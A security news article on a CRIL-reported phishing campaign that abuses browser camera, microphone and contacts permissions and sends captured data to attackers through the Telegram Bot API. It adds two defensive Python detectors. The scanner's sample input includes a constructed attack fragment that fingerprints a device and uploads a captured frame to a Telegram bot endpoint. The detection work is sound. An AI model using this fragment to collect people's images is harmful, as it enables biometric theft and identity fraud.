Malicious Web Interfaces Used for Data Collection | Image: CRIL
A highly active social engineering campaign is rewriting the phishing playbook by shifting its focus from simple passwords to high-value biometric data. According to an executive summary from Cyble Research & Intelligence Labs (CRIL), threat actors have been observed using a sophisticated web-based framework to trick users into granting invasive browser permissions.
Hosted primarily on edgeone.app infrastructure, the campaign uses a diverse array of lures—ranging from “ID Scanners” and “Health Fund AI” to “Telegram ID Freezing” alerts—to create a false sense of urgency.
Unlike traditional phishing sites that rely on typed input, these malicious pages abuse legitimate browser APIs to access a device’s hardware. Once a user clicks “Allow” on a permission prompt, the underlying JavaScript workflow springs into action.
The campaign’s technical execution is both silent and thorough:
- Multimedia Capture: The script initializes a live video stream, “silently captures a frame from the live video stream and exfiltrates it,” along with audio and short video clips.
- Environment Enumeration: Before the camera even activates, the framework performs extensive “device fingerprinting,” gathering data on the operating system, available RAM, CPU cores, and even battery levels.
- Geographic Tracking: By using external APIs like ipapi.co, the attackers enrich stolen data with the victim’s “country, city, latitude, and longitude”.
- Contact Harvesting: In some versions, the script even attempts to use the Contacts Picker API to scrape names, phone numbers, and email addresses from the victim’s contact list.
Researchers at CRIL noted a modern twist in the campaign’s code. The presence of structured annotations and “decorative Unicode symbols” (emojis) within the operational logic suggests that the threat actors may be using generative AI tools to accelerate their development.
For the attackers, the goal is low operational complexity. Instead of building a complex backend, they use the Telegram Bot API as a “streamlined C2 and data exfiltration channel”. This allows stolen JPEG, WebM, and audio files to be transmitted directly to the attacker’s Telegram chat via simple HTTP requests.
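The collection steps listed above and the Telegram Bot API exfiltration channel are each individually common in legitimate pages (video chat, analytics, genuine bots); what characterises this campaign is their co-occurrence in one script. The following heuristic scanner, added here as an example and not CRIL's code or the campaign's code, scores a JavaScript source by that co-occurrence. The indicator names, weights and threshold are this example's own choices, and both sample scripts are constructed fragments rather than real pages.

```python
"""Heuristic scanner for the permission-abuse pattern the article describes.

Added example, not CRIL's code and not the campaign's code. It scores a
JavaScript source by the co-occurrence of the browser APIs and endpoints the
report lists (live media capture, frame grabbing, device fingerprinting,
ipapi.co enrichment, the Contacts Picker API) with the Telegram Bot API
upload methods used as the exfiltration channel. Indicator names, weights
and the threshold are this example's own choices.
"""
import re

# (indicator name, pattern, weight). Collection APIs alone are common in
# legitimate sites, so the verdict requires an exfiltration channel as well.
INDICATORS = [
    ("media_capture", re.compile(r"mediaDevices\.getUserMedia\s*\("), 3),
    ("frame_grab", re.compile(r"\.(toDataURL|toBlob)\s*\("), 1),
    ("media_recorder", re.compile(r"new\s+MediaRecorder\s*\("), 1),
    ("fingerprint", re.compile(r"navigator\.(deviceMemory|hardwareConcurrency|getBattery)\b"), 1),
    ("geo_enrich", re.compile(r"ipapi\.co"), 1),
    ("contacts_picker", re.compile(r"navigator\.contacts\.select\s*\("), 2),
    ("telegram_exfil", re.compile(r"api\.telegram\.org/bot[^/\s'\"]+/send(Photo|Video|Document|Audio|Voice)"), 3),
]
COLLECTION = {"media_capture", "contacts_picker"}
EXFIL = {"telegram_exfil"}
THRESHOLD = 6


def scan(script_text):
    """Return the matched indicator names, the weighted score and a verdict."""
    hits = [name for name, pattern, _ in INDICATORS if pattern.search(script_text)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    present = set(hits)
    suspicious = score >= THRESHOLD and bool(COLLECTION & present) and bool(EXFIL & present)
    return {"hits": hits, "score": score, "suspicious": suspicious}


# Constructed sample: an ordinary WebRTC call page. It captures media but
# hands the tracks to a peer connection, with no bot endpoint involved.
BENIGN_CALL_PAGE = """
const stream = await navigator.mediaDevices.getUserMedia({ video: true, audio: true });
const pc = new RTCPeerConnection(config);
stream.getTracks().forEach(track => pc.addTrack(track, stream));
"""

# Constructed fragments with the shape the report describes: fingerprint,
# geolocate, capture, then post a frame to a bot. Token and helper names are
# placeholders; these lines are not a working script.
PERMISSION_ABUSE_PAGE = """
const info = { cores: navigator.hardwareConcurrency, mem: navigator.deviceMemory };
fetch("https://ipapi.co/json/").then(r => r.json()).then(geo => Object.assign(info, geo));
const stream = await navigator.mediaDevices.getUserMedia({ video: true, audio: true });
canvas.toBlob(blob => upload("https://api.telegram.org/bot<TOKEN_PLACEHOLDER>/sendPhoto", blob));
"""

if __name__ == "__main__":
    for label, source in (("benign", BENIGN_CALL_PAGE), ("abuse", PERMISSION_ABUSE_PAGE)):
        print(label, scan(source))
```

The benign call page scores 3 (media capture only) and is not flagged; the abuse fragments score 9 and are flagged because a collection API and an exfiltration endpoint appear together. Tune the weights against your own corpus: a video-conferencing product will legitimately hit `media_capture` and `media_recorder`, so the combination with `telegram_exfil` is what should drive an alert, not the capture APIs alone.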
The transition from credential theft to harvesting biometric data represents a dangerous evolution in the threat landscape. Because biometric data such as facial images and audio samples are “difficult to revoke or replace,” a compromise cannot be undone the way a password reset undoes a credential leak.
As the CRIL report warns:
“The stolen data can be leveraged to bypass video-KYC and remote identity verification processes, enabling fraudulent account creation, synthetic identity fraud, account takeover, and financial scams…”
Beyond identity theft, these high-resolution images and audio clips are perfect raw material for AI-driven deepfake attacks and extortion schemes.
How to Stay Safe
The campaign often impersonates trusted brands like TikTok, Instagram, and Google Drive to build a facade of legitimacy. To protect yourself and your organization:
- Be Skeptical of Hardware Requests: Legitimate service recovery or verification rarely requires camera or microphone access from an untrusted or unfamiliar domain.
- Audit Browser Permissions: Regularly check which sites have persistent access to your camera and location in your browser settings.
- Report “EdgeOne” Links: Organizations should remain cautious of any verification prompts originating from edgeone.app subdomains.
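For an organisation, the advice to watch edgeone.app prompts and the article's description of the Telegram Bot API as the exfiltration channel translate into two network-side signals a proxy log can surface. The correlation below is an added example, not CRIL's detection logic: the log format (timestamp, client, method, URL, status, quoted user agent), every sample line and the bot token are constructed for this demonstration.

```python
"""Proxy-log correlation for the two network-side signals the article gives:
page loads from edgeone.app subdomains and file uploads to the Telegram Bot
API. Added example, not CRIL's detection logic. The log format and all
sample lines are constructed; the bot token is a placeholder.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)
# Bot API methods that carry a file body; sendMessage (text only) is deliberately excluded.
TELEGRAM_UPLOAD_RE = re.compile(r"^/bot[^/]+/send(Photo|Video|Document|Audio|Voice)$")
WINDOW = timedelta(minutes=10)  # an upload this soon after the page load is treated as linked

# Constructed sample log. 10.1.2.3 shows the full chain, 10.1.2.6 only a page
# load on the shared domain, 10.1.2.5 a text-only bot call from a script.
SAMPLE_LOG = """\
2025-01-15T10:00:01Z 10.1.2.3 GET https://verify-account.edgeone.app/index.html 200 "Mozilla/5.0 Chrome/120"
2025-01-15T10:00:03Z 10.1.2.3 GET https://ipapi.co/json/ 200 "Mozilla/5.0 Chrome/120"
2025-01-15T10:00:09Z 10.1.2.3 POST https://api.telegram.org/bot<TOKEN_PLACEHOLDER>/sendPhoto 200 "Mozilla/5.0 Chrome/120"
2025-01-15T10:00:11Z 10.1.2.3 POST https://api.telegram.org/bot<TOKEN_PLACEHOLDER>/sendVideo 200 "Mozilla/5.0 Chrome/120"
2025-01-15T10:05:00Z 10.1.2.4 GET https://www.example.com/ 200 "Mozilla/5.0 Firefox/121"
2025-01-15T10:20:00Z 10.1.2.6 GET https://docs-portal.edgeone.app/ 200 "Mozilla/5.0 Chrome/120"
2025-01-15T11:30:00Z 10.1.2.5 POST https://api.telegram.org/bot<TOKEN_PLACEHOLDER>/sendMessage 200 "python-requests/2.31"
"""


def parse_line(line):
    """Parse one constructed-format log line; return None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))
    return rec


def classify(rec):
    """Label a request with one of the article's signals, or None."""
    parts = urlsplit(rec["url"])
    host = (parts.hostname or "").lower()
    if host.endswith(".edgeone.app"):
        return "edgeone_page"
    if host == "ipapi.co":
        return "geo_enrich"
    if host == "api.telegram.org" and rec["method"] == "POST" and TELEGRAM_UPLOAD_RE.match(parts.path):
        return "telegram_upload"
    return None


def correlate(log_text):
    """Group signals per client; 'high' when a Bot API upload follows an
    edgeone.app page load within WINDOW, 'medium' for any lone signal."""
    per_client = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        label = classify(rec)
        if label:
            per_client[rec["client"]].append((rec["ts"], label))

    findings = {}
    for client, events in per_client.items():
        events.sort()
        page_times = [t for t, label in events if label == "edgeone_page"]
        severity = "medium"
        for t, label in events:
            if label == "telegram_upload" and any(timedelta(0) <= t - p <= WINDOW for p in page_times):
                severity = "high"
                break
        findings[client] = {"severity": severity, "signals": sorted({label for _, label in events})}
    return findings


if __name__ == "__main__":
    for client, finding in correlate(SAMPLE_LOG).items():
        print(client, finding)
```

Two design points: edgeone.app is a shared hosting domain, so a page load there on its own is only a medium-severity lead worth a look, not something to block outright; and the high-severity rule keys on a browser-originated POST to a file-carrying Bot API method shortly after that page load, because ordinary browsing almost never uploads files to `api.telegram.org`. The text-only `sendMessage` call from a script client is left out on purpose so that in-house automation does not page the on-call.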